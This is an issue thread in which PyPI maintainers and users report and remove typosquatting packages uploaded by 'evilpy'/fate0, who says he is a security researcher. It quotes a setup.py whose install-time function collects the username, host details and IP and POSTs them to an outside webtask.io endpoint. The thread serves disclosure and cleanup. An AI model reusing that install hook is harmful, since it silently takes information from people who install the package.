Package spam

[aklaver]

The site is being spammed with fake packages like:

http://pypi.python.org/pypi/pygpu/0.1.0
http://pypi.python.org/pypi/tkinter/0.1.0

There are more, just look for the description:

"just for fun : )"

[di]

The packages seem mildly malicious as well:

From their setup.py:

def fun():
    username = getpass.getuser()
    hostinfo = platform.uname()

    filename = os.path.join(
        tempfile.gettempdir(),
        hashlib.md5(str(hostinfo).encode('utf-8', errors='ignore')).hexdigest()
    )

    if os.path.exists(filename):
        return

    try:
        open(filename, 'w').write(b'')
    except:
        pass

    try:
        ip = request("https://enabledns.com/ip", method='GET')
    except:
        ip = socket.gethostname()

    data = {
        "title": "%s@%s" % (username, ip),
        "body": "I shouldn't install caffe package, here is my host info: %s" % str(hostinfo)
    }

    headers = {
        'Content-Type': 'application/json'
    }

    request(
        url='https://wt-90ab2e5e0aca15fe3a2a6945e26eb256-0.run.webtask.io/evilpy',
        method='POST',
        data=json.dumps(data).encode("utf-8", errors='ignore'),
        headers=headers
    )


fun()

Here's a full list of them: https://pypi.org/user/evilpy/

[fate0]

Hi, I build the fake package and allow me explain this later

[aklaver]

You are uploading fake packages, under the name evilpy, that harvest information from people who try to install them. I do not need an explanation I do ask that you remove them.

[r1chardj0n3s]

@fate0 please remove those packages immediately or I will delete all of your packages and lock your account.

[fate0]

Time to explain

I am a Security Researcher and also a Python Programer.

In the last few days, I upload several fake or evil package to PyPi to check out
how many people install these packages without checking.

In the first edition, I using webtask.io to transfer data to cookiecutter-evil-pypackage, but this repository has been disabled by GitHub staff.

In the second edition, I just upload the user data to my server, finding some place to publish the data.

Today, I feel disappointed when I know someone has done this before: Typosquatting programming language package managers

BUT, after one year past, NOTHING CHANGE !!!

Every day there are still about 2200 people install the evil package

@r1chardj0n3s I have remove all of the packages in PyPi, so let other guys add whatever the want.

[aklaver]

Thanks.

[katelynsills]

He hasn't removed the packages. https://pypi.python.org/pypi/requirements-txt/1.1.1

[jamadden]

All of the packages added by evilpy have been removed. But within the last 24-48 hours two more packages have been added by fate0 on PyPI (who may or may not be the same as fate0 on github, but it seems likely), following the same template and linking to the same website. The first, requirements-txt is just a wheel and appears to contain no malicious content. However, it depends on the second, ztz, which is distributed as an sdist.

That setup.py looks like this:

#! /usr/bin/env python
# -*- coding: utf-8 -*-

from __future__ import unicode_literals

import os
import sys
import json
import setuptools
from setuptools.command.install import install


class AbortInstall(install):
    def run(self):
        raise SystemExit(
            "[+] It looks like you try to install ztz without checking it.\n"
            "[-] is that alright? \n"
            "[*] Please visit http://evilpackage.fatezero.org/ \n"
            "[/] Aborting installation."
        )


setuptools.setup(
    name="ztz",
    version="0.1.1",
    url="http://evilpackage.fatezero.org/",

    author="fate0",
    author_email="fate0@fatezero.org",

    description="Python wrapper for ztz",
    long_description=open('README.rst').read(),

    packages=setuptools.find_packages(),
    cmdclass={
        'install': AbortInstall
    },

    install_requires=[],

    classifiers=[
        'Development Status :: 2 - Pre-Alpha',
        'Programming Language :: Python',
        'Programming Language :: Python :: 2',
        'Programming Language :: Python :: 2.7',
        'Programming Language :: Python :: 3',
        'Programming Language :: Python :: 3.4',
        'Programming Language :: Python :: 3.5',
    ],
)

So, not directly malicious, per-se, and not directly spyware, either. It also doesn't appear to directly contradict the PyPI terms of service, but IANAL. Information could still be harvested out of the public Google BigTable data about installers, though.

[dstufft]

I've removed the requirements-txt package.

[fate0]

@jamadden @katelynsills @dstufft a detail info in here Package 钓鱼, You can see the detail how I bypass requirements.txt upload limit after I delete all of the evil package.

[fate0]

@dstufft BTW, requirements-txt do the same thing as requestes and requirements-dev. Why not delete them?

[dstufft]

Nobody had reported those names so I was unaware of them. I'll deal with them later tonight.